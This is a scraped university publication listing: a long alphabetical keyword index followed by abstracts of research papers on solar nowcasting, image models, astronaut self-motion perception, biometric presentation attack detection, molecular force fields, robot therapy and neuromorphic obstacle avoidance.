- Sonar (1)
- Space exploration (1)
- Sparse matrix format (1)
- Spatio-Temporal (1)
- Spatiotemporality (1)
- Spectral Analysis (1)
- Spectral Clustering (1)
- Spectroscopy (1)
- Spectrum occupancy (1)
- Spectrum optimization (1)
- Speech Act Theory (1)
- Spherical Treadmill (1)
- Spherical treadmill (1)
- Split Axis (1)
- Standards (1)
- Star Trek (1)
- State machines (1)
- Stereoscopic Rendering (1)
- Stereoscopic rendering (1)
- Story Element (1)
- Stream cipher (1)
- Streaming (1)
- Stress Management (1)
- Supervised classification (1)
- Supervised learning (1)
- Supply chains (1)
- Surrogate Modelling (1)
- Surrogate models (1)
- Surrogate-assistance (1)
- Swim Stroke Analysis (1)
- Switched power electronic systems (1)
- Symmetry detector (1)
- Synthetic perception (1)
- System health monitoring (1)
- SystemVerilog (1)
- TEL-AML1 (1)
- TLS (1)
- TP53 (1)
- Tactile Feedback (1)
- Tactile feedback (1)
- Tag (1)
- Task Frame Formalism (1)
- Task allocation (1)
- Tautomers (1)
- Teaching Quality Pact (1)
- Telecommunication network reliability (1)
- Telecommunication network routing (1)
- Teleconferencing system (1)
- Template Attacks (1)
- Temporal constraints (1)
- Temporally-weighted (1)
- Terrain rendering (1)
- Testing (1)
- Text detection (1)
- Text recognition (1)
- Textureless objects (1)
- Therapy (1)
- Throughput (1)
- Tiled displays (1)
- Tiled-display walls (1)
- Time extended assignment (1)
- Time measurement (1)
- Timing analysis (1)
- Timing channel (1)
- ToF Camera (1)
- Token (1)
- Touchscreen interaction (1)
- Touchscreens (1)
- Toyota HSR (1)
- Trace algebra (1)
- Traceability (1)
- Tracking (1)
- Tracking by detection (1)
- Traffic Simulations (1)
- Traffic sign detection (1)
- Traffic sign recognition (1)
- Training Model (1)
- Training Optimization (1)
- Transfer Learning (1)
- Transfer learning (1)
- Transformations between various description formats (1)
- Transforms (1)
- Translocation (1)
- Transparency (1)
- Transponder (1)
- Travel Techniques (1)
- Treatment of discontinuities and singularities in ordinary differential equations (1)
- Tree Stumps (1)
- Two-Ray (1)
- Two-factor Authentication (1)
- U-NII band (1)
- UAV teleoperation (1)
- UGV (1)
- UI design (1)
- USAR (1)
- Ultrasonic array (1)
- Uncertainty (1)
- Uncertainty Estimation (1)
- Uncertainty Quantification (1)
- Underwater (1)
- Unidirectional thermoplastic composites (1)
- Unifying theories (1)
- Unknown parameter degradation (1)
- Unmanned Aerial Vehicle (UAV) (1)
- User Roles (1)
- User Study (1)
- User engagement (1)
- User experience design (1)
- User interface (1)
- User interfaces (1)
- User-Centered Approach (1)
- User-Centered Design (1)
- User-Computer Interface (1)
- User-centered privacy engineering (1)
- VR system design (1)
- VR-based systems (1)
- Vacuum Cleaner (1)
- Valproic acid (1)
- Variability Management (1)
- Variability Resolution (1)
- Variational Autoencoder (1)
- Vector Intrinsics (1)
- Vector Units (1)
- Vehicle-2-Vehicle Communication (1)
- Vehicle-to- Vehicle Communication (V2V) (1)
- Vehicle-to-Infrastructure Communication (1)
- Vehicle-to-Infrastructure Communication (V2I) (1)
- Vehicle-to-Vehicle Com- munication (1)
- Vehicular Ad hoc Networks (VANETs) (1)
- Verilog (1)
- Vibrational microspectroscopy (1)
- Video surveillance (1)
- View selection (1)
- Virtual Agents (1)
- Virtual Environment (1)
- Virtual Environments (1)
- Virtual Memory Palace (1)
- Virtual attention (1)
- Virtual environments (1)
- Visual Cueing (1)
- Visual Discrimination (1)
- Visual perception (1)
- Visualization design and evaluation methods (1)
- Visualization systems and tools (1)
- Visuelle Wahrnehmung (1)
- Vulnerable Groups (1)
- V˙CO2 prediction (1)
- V˙O2 prediction (1)
- WDS (1)
- WWW (1)
- Wang-tiles (1)
- Web (1)
- Web components (1)
- WfMS (1)
- Whole body motion (1)
- Wi-Fi (1)
- WiAFirm (1)
- WiFi-based Long Distance (WiLD) (1)
- WiFi-based Long Distance networks (1)
- Wireless Backhaul Network (1)
- Wissensarbeit (1)
- Wissensintensive Geschäftsprozesse (1)
- Workflow (1)
- Workflow Management (1)
- XGBoost (1)
- XML (1)
- XML Signature (1)
- XML Signature Wrapping (1)
- XML schema for bond graph models (1)
- XNA Game Studio (1)
- XSLT (1)
- Xeon Phi knights landing (1)
- YANG (1)
- YOLO (1)
- Young adults (1)
- ZWave (1)
- ZigBee (1)
- ZombieLoad (1)
- accelerometer (1)
- activation function (1)
- acute (1)
- adaptive agents (1)
- adaptive binarization (1)
- adaptive filters (1)
- adaptive trigger (1)
- affective computing (1)
- allopurinol (1)
- ambulatory monitoring (1)
- analog/digital signal processing (1)
- analyses (1)
- analytical redundancy relation residuals (1)
- analytical redundancy relations (1)
- anomaly detection (1)
- antibody deficiency (1)
- apoptosis (1)
- architectural distortion (1)
- artifacts (1)
- asset transfer (1)
- assistive robotics (1)
- assistive robots (1)
- atomic instructions (1)
- atomic operation (1)
- audio-tactile feedback (1)
- augmented, and virtual realities (1)
- authentication (1)
- authoring tools (1)
- autoimmune lymphoproliferative syndrome (1)
- autoinflammatory disease (1)
- automated 3D scanning (1)
- automatic measurement validation (1)
- automatic music generation (1)
- automation (1)
- automation of sample processing (1)
- autonomous driving (1)
- averaged bond graph models (1)
- back-of-device interaction (1)
- background motion (1)
- bagging (1)
- bass-shaker (1)
- benchmarking (1)
- bicausal diagnostic Bond Graphs (1)
- bicycle (1)
- binary classification (1)
- bioinformatics (1)
- biorder (1)
- bloat (1)
- body-centric cues (1)
- bond graph (1)
- bond graphs (1)
- bond-graph-based physical systems modelling (1)
- bootstrapping (1)
- brain computer interfaces (1)
- breast cancer (1)
- brightfield microscopy (1)
- building automation (1)
- built environment (1)
- bus load (1)
- caching (1)
- camera (1)
- camera-based person detection (1)
- can bus (1)
- cancer (1)
- cellular automata (1)
- change process (1)
- chemical sensors (1)
- childhood (1)
- childhood cancer syndrome (1)
- client-side component model (1)
- closed kinematic chain (1)
- co-located collaboration (1)
- cognitive radio (1)
- collaboration (1)
- collaborative learning (1)
- collision (1)
- colorimetry (1)
- commuting (1)
- compensation (1)
- complete basis set limit (1)
- component analyses (1)
- component based (1)
- computational causalities (1)
- computational logic (1)
- computer games (1)
- computer-supported collaborative work (1)
- concrete plate (1)
- conformations (1)
- constitutional mismatch repair syndrome (1)
- constraint relaxation (1)
- constructive process deviance (1)
- control (1)
- control architectures (1)
- controller design (1)
- convex optimization (1)
- cooperative path planning (1)
- correlation (1)
- crawling (1)
- cross-disciplinary (1)
- cryptanalytic attacks (1)
- cryptocurrency (1)
- cuSPARSE (1)
- curved shell (1)
- cyanide (1)
- cybersickness (1)
- data analysis (1)
- data glove (1)
- data logging (1)
- data visualisation (1)
- database (1)
- database systems (1)
- decision tree learning (1)
- degraded DNA (1)
- denial-of-service (1)
- dependable robots (1)
- depth perception (1)
- design process (1)
- designing air flow (1)
- detection (1)
- developer centered security (1)
- differential algebraic equation systems (1)
- digital co-creation (1)
- digital platform ecosystem (1)
- digital storytelling (1)
- dimensionality reduction (1)
- direct feedback (1)
- directed hypergraphs (1)
- directional antennas (1)
- disabled people (1)
- displacement measurement (1)
- distance perception (1)
- distributed authoring (1)
- distributed processing (1)
- domain adaptation (1)
- driving (1)
- drone video quality (1)
- drugs (1)
- dynamics (1)
- e-Research (1)
- e-learning course structure (1)
- eavesdropping (1)
- echo state network (1)
- eco-driving (1)
- electrochemical sensor (1)
- elite sports (1)
- embedded collaborative learning (1)
- embodied interfaces (1)
- emotion computing (1)
- employee privacy (1)
- energy (1)
- energy efficient transportation (1)
- energy optimal driving (1)
- energy saving (1)
- entwicklerzentrierte Sicherheit (1)
- erbliche Krebssyndrome (1)
- estimation (1)
- evaluation as a mean to communication (1)
- evolution strategies (1)
- evolutionary illumination (1)
- evolved neural network controller (1)
- evolving look ahead controllers (1)
- execution (1)
- explainable AI (1)
- explainable gesture recognition (1)
- exploration (1)
- extraction-linked bias (1)
- extreme learning machine (1)
- eye movement (1)
- eye tracking (1)
- facial expression recognition (1)
- factor analysis (1)
- failure prognostic (1)
- fault indicators (1)
- fault scenarios (1)
- fault handling (1)
- faults in robotics (1)
- feature discovery (1)
- feature selection (1)
- felt obligations (1)
- fiducial marker (1)
- fingerprint (1)
- finite element method (1)
- fitness-fatigue model (1)
- fixed causalities generation of analytical redundancy relations (1)
- flying (1)
- force field (1)
- force sensing (1)
- forensic (1)
- forms of mathematical models (1)
- fpga (1)
- frequency (1)
- fuel (1)
- full-body interface (1)
- fuzzy logic (1)
- game engine (1)
- gamification (1)
- gaming (1)
- gaze (1)
- general plate theory (1)
- generation of ARRs (1)
- generative design (1)
- genes (1)
- genetic neutrality (1)
- genetic testing (1)
- genetics (1)
- genetische Testung (1)
- global illumination (1)
- graphene oxide powder (1)
- graphene oxide powders (1)
- graphs (1)
- grasp motions (1)
- grasping (1)
- gravito-inertial force (1)
- hand guidance (1)
- haptic feedback (1)
- haptic interfaces (1)
- head down bed rest (1)
- heart rate control (1)
- heart rate modeling (1)
- heart rate prediction (1)
- heat shrink tubes (1)
- heavy metal (1)
- heterogeneous networks (1)
- heuristics (1)
- hierarchical clustering (1)
- high degree of diagnostic coverage and reliability (1)
- high diagnostic coverage and reliability (1)
- high dynamic range resistance readout (1)
- high speed railway vehicle (1)
- high-throughput DNA sequencing (1)
- high-throughput sequencing (1)
- higher education (1)
- holography (1)
- hospital environment (1)
- hospital-acquired infections (1)
- human computer interaction (1)
- human microbiome (1)
- human-centred design (1)
- human-centric lighting (1)
- human-robot collaboration (1)
- hybrid dynamics solver (1)
- hybrid robot skill representation (1)
- hybrid system (1)
- hybrid system models (1)
- hydrocarbon (1)
- hypermedia applications (1)
- iOER (1)
- ideation (1)
- image captioning (1)
- image sequence processing (1)
- immersion (1)
- immersive systems (1)
- immunodeficiency (1)
- indicators calculation (1)
- information display methods (1)
- information flows (1)
- informational self-determination (1)
- infrared pattern (1)
- innovative work behavior (1)
- instance segmentation (1)
- intelligent pedestrian counter (1)
- interaction techniques (1)
- interactive computer graphics (1)
- interactive distributed rendering (1)
- intercultural learning (1)
- interference (1)
- international (1)
- international teams (1)
- intervention mechanisms (1)
- inverse model (1)
- ion-selective electrodes (1)
- irregularity amplitude (1)
- isolation (1)
- issue tracker (1)
- knowledge engineering (1)
- knowledge graphs (1)
- knowledge-management (1)
- large-high-resolution displays (1)
- latent class analysis (1)
- leaning, self-motion perception (1)
- leaning-based interfaces (1)
- learning object repositories (1)
- learning traces (1)
- learning-based fault detection and diagnosis (1)
- leukemia (1)
- light curtains (1)
- linguistic variable (1)
- linguistic variables (1)
- link calibration (1)
- lipid (1)
- load control (1)
- local optimization (1)
- locomotion (1)
- locomotion interface (1)
- long short-term memory (1)
- long-distance 802.11 (1)
- long-distance modeling (1)
- low-cost air sensor (1)
- lymphocytic (1)
- manipulation (1)
- massive parallel sequencing (1)
- mathematical modeling (1)
- measurement (1)
- mebendazole (1)
- mechatronic systems (1)
- medical training (1)
- mental models (1)
- mesoscopic agents (1)
- micro-benchmarks (1)
- microbial community structure (1)
- microbial ecology (1)
- microbiome (1)
- microbiome analyses (1)
- microcomputers (1)
- microcontroller (1)
- mininig software repositories (1)
- mixed reality (1)
- mobile applications (1)
- mobile manipulators (1)
- mobile or handheld device (1)
- mobile projection (1)
- mobile robots (1)
- mobile web (1)
- mobility assistance system (1)
- modal superposition (1)
- mode switching LTI models (1)
- mode-dependent implicit state space model (1)
- mode-switching linear time-invariant models (1)
- model exchange (1)
- modeling (1)
- modelling methodology (1)
- modular web (1)
- momentary frequency (1)
- mood (1)
- morphological operator (1)
- motion capture (1)
- motion control (1)
- motion cueing (1)
- motion platform (1)
- motion sickness (1)
- motion trajectory enhancement (1)
- mp2 (1)
- multi causal strain (1)
- multi robot systems (1)
- multi-channel power sourcing (1)
- multi-layer display (1)
- multi-objective optimization (1)
- multi-screen visualization environments (1)
- multi-solution optimization (1)
- multi-user VR (1)
- multibody system (1)
- multibody systems (1)
- multibond graphs (1)
- multidisciplinary (1)
- multimodal optimization (1)
- multiple Xbox 360 (1)
- multiple computer systems (1)
- multiresolution analysis (1)
- multiscale parameterization (1)
- multisensory (1)
- multisensory interface (1)
- music analysis (1)
- mutation (1)
- nano-composite (1)
- natural language processing (1)
- natural user interface (1)
- navigational search (1)
- near infrared (1)
- near-infrared (1)
- neural networks (1)
- neuro-cognitive performance (1)
- neuroevolution (1)
- neutral buoyancy (1)
- next generation sequencing (1)
- noise suppression (1)
- nomadic text entry (1)
- non-linear projection (1)
- nonlinear storytelling (1)
- numerical computation of residuals (1)
- object identification (1)
- object-oriented modelling (1)
- object-oriented physical systems modelling (1)
- objective function (1)
- octane (1)
- open educational resources (OERs) (1)
- operation mode independent causalities (1)
- optical character recognition (1)
- optical coherence tomography (1)
- optical flow (1)
- optical safeguard sensor (1)
- optical tracking (1)
- optical triangulation (1)
- optimal control (1)
- optimal control problem (1)
- optimized geometries (1)
- opto-electronic protective device (1)
- optoelectronic (1)
- parallel BFS (1)
- parallel difference visualization (1)
- parallel work queue (1)
- parameter estimation (1)
- parameter sensitivities of residuals of ARRs (1)
- parameter sensitivity of residuals (1)
- parametric (1)
- payment protocol (1)
- pedestrian counting system (1)
- pedestrian movements (1)
- pen interaction (1)
- perceived quality (1)
- perception of upright (1)
- performance modeling (1)
- performance optimizations (1)
- performance prediction (1)
- peripheral visual field (1)
- person and object detection and recognition (1)
- phenomenological approaches (1)
- phenotypic diversity (1)
- phenotypic feature (1)
- phenotypic niching (1)
- photometry (1)
- physical model immersive (1)
- physiological monitoring (1)
- plasma-enhanced CVD (PECVD) (deposition) (1)
- porous material (1)
- posture analysis (1)
- power spectral density (1)
- pre-optimization (1)
- predictive maintenance (1)
- prefrontal cortex (1)
- prehensile motions (1)
- preprocessing (1)
- presentation attack detection (1)
- presentation attack detection (PAD) (1)
- prioritizable ranking (1)
- privacy at work (1)
- privacy by design (1)
- process (1)
- prognosis (1)
- project-based learning (1)
- projection (1)
- projection based systems (1)
- propan-2-ol (1)
- property-based testing for robots (1)
- prototype theory (1)
- proxemics (1)
- pseudo-random number generator (1)
- psychophysics (1)
- qualitative reasoning (1)
- quality-diversity (1)
- quantitative model-based fault detection (1)
- quantum mechanics (1)
- question answering (1)
- radio-frequency identification (RFID) systems (1)
- rapid prototyping tool (1)
- ray tracing (1)
- rds encoding (1)
- recurrent neural network function (1)
- reference dataset (1)
- refined beam theory (1)
- region of interest (1)
- regression (1)
- regression testing (1)
- remaining useful life (1)
- remote diagnosis (1)
- remote sensing (1)
- remote-controlled robots (1)
- rendering (computer graphics) (1)
- repeated trend projection (1)
- representation (1)
- representation learning (1)
- requirements (1)
- requirements analysis (1)
- requirements management (1)
- residual bond graph sinks (1)
- resource utilization (1)
- reuse of indicators (1)
- ride comfort (1)
- road (1)
- robot action diagnosability (1)
- robot behaviour model (1)
- robot component monitoring (1)
- robot context awareness (1)
- robot control (1)
- robot control architecture (1)
- robot failure diagnosis (1)
- robot kinematics (1)
- robot personalisation (1)
- robot skill execution failures (1)
- robot skill generalisation (1)
- robotic arm (1)
- robotic black box (1)
- robotic evaluation (1)
- robots (1)
- routing (1)
- rules (1)
- run-time adaptation (1)
- rural areas (1)
- scalability (1)
- scene element representation (1)
- scene-segmentation (1)
- scenes (1)
- screens (display) (1)
- security APIs (1)
- security and privacy literacy (1)
- see-through display (1)
- see-through head-mounted displays (1)
- self-configuration (1)
- self-management (1)
- semantic image seg-mentation (1)
- semantic mapping (1)
- semi-continuous locomotion (1)
- semi-supervised learning (1)
- sensemaking (1)
- sensor data acquisition (1)
- sensor data transmission (1)
- sensor fusion (1)
- sensor resilience (1)
- sensor-based fault detection and diagnosis (1)
- sensory perception (1)
- server processors (1)
- service activities (1)
- shared memory (1)
- shell theory (1)
- short tandem repeat (1)
- short-term memory (1)
- signal processing algorithm (1)
- simulation of fault scenarios (1)
- simulation-based robot testing (1)
- simulator (1)
- situation awareness (1)
- skill execution models (1)
- skin detection (1)
- slip detection (1)
- slope based signature (1)
- small molecule (1)
- software (1)
- software development (1)
- software engineering (1)
- software testing (1)
- software-based feedback agents (1)
- software-defined networking (1)
- space flight analog (1)
- spatial augmented reality (1)
- spatial orientation (1)
- spectral rendering (1)
- spectrum scan (1)
- spectrum sensing (1)
- speech recognition (1)
- spinal posture (1)
- static friction (1)
- stereoscopic vision (1)
- stiffeners (1)
- story authoring (1)
- strain (1)
- stress (1)
- stress detection (1)
- subjective visual vertical (1)
- submillimeter precision (1)
- support vector machine (1)
- surface textures (1)
- surface topography (1)
- surrogate assisted phenotypic niching (1)
- surrogate models (1)
- switched three-phase power inverter (1)
- synthetic dataset (1)
- system mode independent bond graph representation (1)
- system modes (1)
- tactile sensing (1)
- task models (1)
- task planning (1)
- taxonomie (1)
- teaching (1)
- technology mapping (1)
- teleoperation (1)
- teleportation (1)
- telepresence (1)
- telomeres (1)
- territoriality (1)
- test case reduction (1)
- text detection (1)
- text entry in motion (1)
- text localization (1)
- textual model description languages (1)
- thread mapping (1)
- tiled displays (1)
- time series analysis (1)
- time series processing (1)
- tools for education (1)
- touchscreen (1)
- trace model (1)
- trace-based system (1)
- track irregularity (1)
- traffic sign detection (1)
- traffic sign localization (1)
- training monitoring (1)
- training performance relationship (1)
- transparency-enhancing technologies (1)
- travel techniques (1)
- true random number generator (1)
- tumor microenvironment (1)
- tumor-infiltrating immune cells (1)
- ultrasonic sensor (1)
- un-manned aerial vehicle (1)
- uncertainties (1)
- unexpected situations (1)
- unique bond graph representation for all modes of operation (1)
- unmanned ground vehicle (1)
- unrolling (1)
- unstructured data (1)
- unsupervised learning (1)
- usability (1)
- usable privacy controls (1)
- usable secure email (1)
- usage contexts (1)
- usage data analysis (1)
- user documentation (1)
- user engagement (1)
- user input (1)
- user interaction (1)
- user interface design (1)
- user modelling (1)
- vector units (1)
- verification and validation of robot action execution (1)
- vestibular system (1)
- view management (1)
- virtual environment framework (1)
- virtual locomotion (1)
- virtual or soft keyboard (1)
- visual attention (1)
- visual quality control (1)
- visualisation (1)
- visualization (1)
- visuohaptic feedback (1)
- walking (1)
- water dimer (1)
- wavelet (1)
- wearable sensor (1)
- wearable sensors (1)
- web (1)
- web components (1)
- web services (1)
- web technology (1)
- website (1)
- weight perception (1)
- weighting factors (1)
- welfare technology (1)
- whole-body interface (1)
- whole-exome sequencing (1)
- wind nuisance (1)
- wind nuisance threshold (1)
- wireless communication (1)
- wireless mesh networks (1)
- wireless performance (1)
- wmSDN (1)
- workday breaks (1)
- workspace awareness (1)
- xorshift-generator (1)
- youBot (1)
- zooming interface (1)
- zooming interfaces (1)
- Wavenet (1)
This work proposes a novel approach for probabilistic end-to-end all-sky imager-based nowcasting with horizons of up to 30 min using an ImageNet pre-trained deep neural network. The method involves a two-stage approach. First, a backbone model is trained to estimate the irradiance from all-sky imager (ASI) images. The model is then extended and retrained on image and parameter sequences for forecasting. An open access data set is used for training and evaluation. We investigated the impact of simultaneously considering global horizontal (GHI), direct normal (DNI), and diffuse horizontal irradiance (DHI) on training time and forecast performance as well as the effect of adding parameters describing the irradiance variability proposed in the literature. The backbone model estimates current GHI with an RMSE and MAE of 58.06 and 29.33 W m−2, respectively. When extended for forecasting, the model achieves an overall positive skill score reaching 18.6 % compared to a smart persistence forecast. Minor modifications to the deterministic backbone and forecasting models enables the architecture to output an asymmetrical probability distribution and reduces training time while leading to similar errors for the backbone models. Investigating the impact of variability parameters shows that they reduce training time but have no significant impact on the GHI forecasting performance for both deterministic and probabilistic forecasting while simultaneously forecasting GHI, DNI, and DHI reduces the forecast performance.
In vision tasks, a larger effective receptive field (ERF) is associated with better performance. While attention natively supports global context, convolution requires multiple stacked layers and a hierarchical structure for large context. In this work, we extend Hyena, a convolution-based attention replacement, from causal sequences to the non-causal two-dimensional image space. We scale the Hyena convolution kernels beyond the feature map size up to 191$\times$191 to maximize the ERF while maintaining sub-quadratic complexity in the number of pixels. We integrate our two-dimensional Hyena, HyenaPixel, and bidirectional Hyena into the MetaFormer framework. For image categorization, HyenaPixel and bidirectional Hyena achieve a competitive ImageNet-1k top-1 accuracy of 83.0% and 83.5%, respectively, while outperforming other large-kernel networks. Combining HyenaPixel with attention further increases accuracy to 83.6%. We attribute the success of attention to the lack of spatial bias in later stages and support this finding with bidirectional Hyena.
Is It Really You Who Forgot the Password? When Account Recovery Meets Risk-Based Authentication
(2024)
Self-motion perception is a multi-sensory process that involves visual, vestibular, and other cues. When perception of self-motion is induced using only visual motion, vestibular cues indicate that the body remains stationary, which may bias an observer’s perception. When lowering the precision of the vestibular cue by for example, lying down or by adapting to microgravity, these biases may decrease, accompanied by a decrease in precision. To test this hypothesis, we used a move-to-target task in virtual reality. Astronauts and Earth-based controls were shown a target at a range of simulated distances. After the target disappeared, forward self-motion was induced by optic flow. Participants indicated when they thought they had arrived at the target’s previously seen location. Astronauts completed the task on Earth (supine and sitting upright) prior to space travel, early and late in space, and early and late after landing. Controls completed the experiment on Earth using a similar regime with a supine posture used to simulate being in space. While variability was similar across all conditions, the supine posture led to significantly higher gains (target distance/perceived travel distance) than the sitting posture for the astronauts pre-flight and early post-flight but not late post-flight. No difference was detected between the astronauts’ performance on Earth and onboard the ISS, indicating that judgments of traveled distance were largely unaffected by long-term exposure to microgravity. Overall, this constitutes mixed evidence as to whether non-visual cues to travel distance are integrated with relevant visual cues when self-motion is simulated using optic flow alone.
Selection Performance and Reliability of Eye and Head Gaze Tracking Under Varying Light Conditions
(2024)
Due to their user-friendliness and reliability, biometric systems have taken a central role in everyday digital identity management for all kinds of private, financial and governmental applications with increasing security requirements. A central security aspect of unsupervised biometric authentication systems is the presentation attack detection (PAD) mechanism, which defines the robustness to fake or altered biometric features. Artifacts like photos, artificial fingers, face masks and fake iris contact lenses are a general security threat for all biometric modalities. The Biometric Evaluation Center of the Institute of Safety and Security Research (ISF) at the University of Applied Sciences Bonn-Rhein-Sieg has specialized in the development of a near-infrared (NIR)-based contact-less detection technology that can distinguish between human skin and most artifact materials. This technology is highly adaptable and has already been successfully integrated into fingerprint scanners, face recognition devices and hand vein scanners. In this work, we introduce a cutting-edge, miniaturized near-infrared presentation attack detection (NIR-PAD) device. It includes an innovative signal processing chain and an integrated distance measurement feature to boost both reliability and resilience. We detail the device’s modular configuration and conceptual decisions, highlighting its suitability as a versatile platform for sensor fusion and seamless integration into future biometric systems. This paper elucidates the technological foundations and conceptual framework of the NIR-PAD reference platform, alongside an exploration of its potential applications and prospective enhancements.
Force field (FF) based molecular modeling is an often used method to investigate and study structural and dynamic properties of (bio-)chemical substances and systems. When such a system is modeled or refined, the force field parameters need to be adjusted. This force field parameter optimization can be a tedious task and is always a trade-off in terms of errors regarding the targeted properties. To better control the balance of various properties’ errors, in this study we introduce weighting factors for the optimization objectives. Different weighting strategies are compared to fine-tune the balance between bulk-phase density and relative conformational energies (RCE), using n-octane as a representative system. Additionally, a non-linear projection of the individual property-specific parts of the optimized loss function is deployed to further improve the balance between them. The results show that the overall error is reduced. One interesting outcome is a large variety in the resulting optimized force field parameters (FFParams) and corresponding errors, suggesting that the optimization landscape is multi-modal and very dependent on the weighting factor setup. We conclude that adjusting the weighting factors can be a very important feature to lower the overall error in the FF optimization procedure, giving researchers the possibility to fine-tune their FFs.
While humans can effortlessly pick a view from multiple streams, automatically choosing the best view is a challenge. Choosing the best view from multi-camera streams poses a problem regarding which objective metrics should be considered. Existing works on view selection lack consensus about which metrics should be considered to select the best view. The literature on view selection describes diverse possible metrics. And strategies such as information-theoretic, instructional design, or aesthetics-motivated fail to incorporate all approaches. In this work, we postulate a strategy incorporating information-theoretic and instructional design-based objective metrics to select the best view from a set of views. Traditionally, information-theoretic measures have been used to find the goodness of a view, such as in 3D rendering. We adapted a similar measure known as the viewpoint entropy for real-world 2D images. Additionally, we incorporated similarity penalization to get a more accurate measure of the entropy of a view, which is one of the metrics for the best view selection. Since the choice of the best view is domain-dependent, we chose demonstration-based training scenarios as our use case. The limitation of our chosen scenarios is that they do not include collaborative training and solely feature a single trainer. To incorporate instructional design considerations, we included the trainer’s body pose, face, face when instructing, and hands visibility as metrics. To incorporate domain knowledge we included predetermined regions’ visibility as another metric. All of those metrics are taken into account to produce a parameterized view recommendation approach for demonstration-based training. An online study using recorded multi-camera video streams from a simulation environment was used to validate those metrics. Furthermore, the responses from the online study were used to optimize the view recommendation performance with a normalized discounted cumulative gain (NDCG) value of 0.912, which shows good performance with respect to matching user choices.
During robot-assisted therapy, a robot typically needs to be partially or fully controlled by therapists, for instance using a Wizard-of-Oz protocol; this makes therapeutic sessions tedious to conduct, as therapists cannot fully focus on the interaction with the person under therapy. In this work, we develop a learning-based behaviour model that can be used to increase the autonomy of a robot’s decision-making process. We investigate reinforcement learning as a model training technique and compare different reward functions that consider a user’s engagement and activity performance. We also analyse various strategies that aim to make the learning process more tractable, namely i) behaviour model training with a learned user model, ii) policy transfer between user groups, and iii) policy learning from expert feedback. We demonstrate that policy transfer can significantly speed up the policy learning process, although the reward function has an important effect on the actions that a robot can choose. Although the main focus of this paper is the personalisation pipeline itself, we further evaluate the learned behaviour models in a small-scale real-world feasibility study in which six users participated in a sequence learning game with an assistive robot. The results of this study seem to suggest that learning from guidance may result in the most adequate policies in terms of increasing the engagement and game performance of users, but a large-scale user study is needed to verify the validity of that observation.
Although climate-induced liquidity risks can cause significant disruptions and instabilities in the financial sector, they are frequently overlooked in current debates and policy discussions. This paper proposes a macro-financial agent-based integrated assessment model to investigate the transmission channels of climate risks to financial instability and study the emergence of liquidity crises through interbank market dynamics. Our simulations show that the financial system could experience serious funding and market liquidity shortages due to climate-induced liquidity crises. Our investigation contributes to our understanding of the impact - and possible solutions - to climate-induced liquidity crises, besides the issue of asset stranding related to transition risks usually considered in the existing studies.
A PM2.5 concentration prediction framework with vehicle tracking system: From cause to effect
(2023)
Representing 3D surfaces as level sets of continuous functions over R3 is the common denominator of neural implicit representations, which recently enabled remarkable progress in geometric deep learning and computer vision tasks. In order to represent 3D motion within this framework, it is often assumed (either explicitly or implicitly) that the transformations which a surface may undergo are homeomorphic: this is not necessarily true, for instance, in the case of fluid dynamics. In order to represent more general classes of deformations, we propose to apply this theoretical framework as regularizers for the optimization of simple 4D implicit functions (such as signed distance fields). We show that our representation is capable of capturing both homeomorphic and topology-changing deformations, while also defining correspondences over the continuously-reconstructed surfaces.
Neuromorphic computing aims to mimic the computational principles of the brain in silico and has motivated research into event-based vision and spiking neural networks (SNNs). Event cameras (ECs) capture local, independent changes in brightness, and offer superior power consumption, response latencies, and dynamic ranges compared to frame-based cameras. SNNs replicate neuronal dynamics observed in biological neurons and propagate information in sparse sequences of ”spikes”. Apart from biological fidelity, SNNs have demonstrated potential as an alternative to conventional artificial neural networks (ANNs), such as in reducing energy expenditure and inference time in visual classification. Although potentially beneficial for robotics, the novel event-driven and spike-based paradigms remain scarcely explored outside the domain of aerial robots.
To investigate the utility of brain-inspired sensing and data processing in a robotics application, we developed a neuromorphic approach to real-time, online obstacle avoidance on a manipulator with an onboard camera. Our approach adapts high-level trajectory plans with reactive maneuvers by processing emulated event data in a convolutional SNN, decoding neural activations into avoidance motions, and adjusting plans in a dynamic motion primitive formulation. We conducted simulated and real experiments with a Kinova Gen3 arm performing simple reaching tasks involving static and dynamic obstacles. Our implementation was systematically tuned, validated, and tested in sets of distinct task scenarios, and compared to a non-adaptive baseline through formalized quantitative metrics and qualitative criteria.
The neuromorphic implementation facilitated reliable avoidance of imminent collisions in most scenarios, with 84% and 92% median success rates in simulated and real experiments, where the baseline consistently failed. Adapted trajectories were qualitatively similar to baseline trajectories, indicating low impacts on safety, predictability and smoothness criteria. Among notable properties of the SNN were the correlation of processing time with the magnitude of perceived motions (captured in events) and robustness to different event emulation methods. Preliminary tests with a DAVIS346 EC showed similar performance, validating our experimental event emulation method. These results motivate future efforts to incorporate SNN learning, utilize neuromorphic processors, and target other robot tasks to further explore this approach.
Skill generalisation and experience acquisition for predicting and avoiding execution failures
(2023)
For performing tasks in their target environments, autonomous robots usually execute and combine skills. Robot skills in general and learning-based skills in particular are usually designed so that flexible skill acquisition is possible, but without an explicit consideration of execution failures, the impact that failure analysis can have on the skill learning process, or the benefits of introspection for effective coexistence with humans. Particularly in human-centered environments, the ability to understand, explain, and appropriately react to failures can affect a robot's trustworthiness and, consequently, its overall acceptability. Thus, in this dissertation, we study the questions of how parameterised skills can be designed so that execution-level decisions are associated with semantic knowledge about the execution process, and how such knowledge can be utilised for avoiding and analysing execution failures. The first major segment of this work is dedicated to developing a representation for skill parameterisation whose objective is to improve the transparency of the skill parameterisation process and enable a semantic analysis of execution failures. We particularly develop a hybrid learning-based representation for parameterising skills, called an execution model, which combines qualitative success preconditions with a function that maps parameters to predicted execution success. The second major part of this work focuses on applications of the execution model representation to address different types of execution failures. We first present a diagnosis algorithm that, given parameters that have resulted in a failure, finds a failure hypothesis by searching for violations of the qualitative model, as well as an experience correction algorithm that uses the found hypothesis to identify parameters that are likely to correct the failure. Furthermore, we present an extension of execution models that allows multiple qualitative execution contexts to be considered so that context-specific execution failures can be avoided. Finally, to enable the avoidance of model generalisation failures, we propose an adaptive ontology-assisted strategy for execution model generalisation between object categories that aims to combine the benefits of model-based and data-driven methods; for this, information about category similarities as encoded in an ontology is integrated with outcomes of model generalisation attempts performed by a robot. The proposed methods are exemplified in terms of various use cases - object and handle grasping, object stowing, pulling, and hand-over - and evaluated in multiple experiments performed with a physical robot. The main contributions of this work include a formalisation of the skill parameterisation problem by considering execution failures as an integral part of the skill design and learning process, a demonstration of how a hybrid representation for parameterising skills can contribute towards improving the introspective properties of robot skills, as well as an extensive evaluation of the proposed methods in various experiments. We believe that this work constitutes a small first step towards more failure-aware robots that are suitable to be used in human-centered environments.
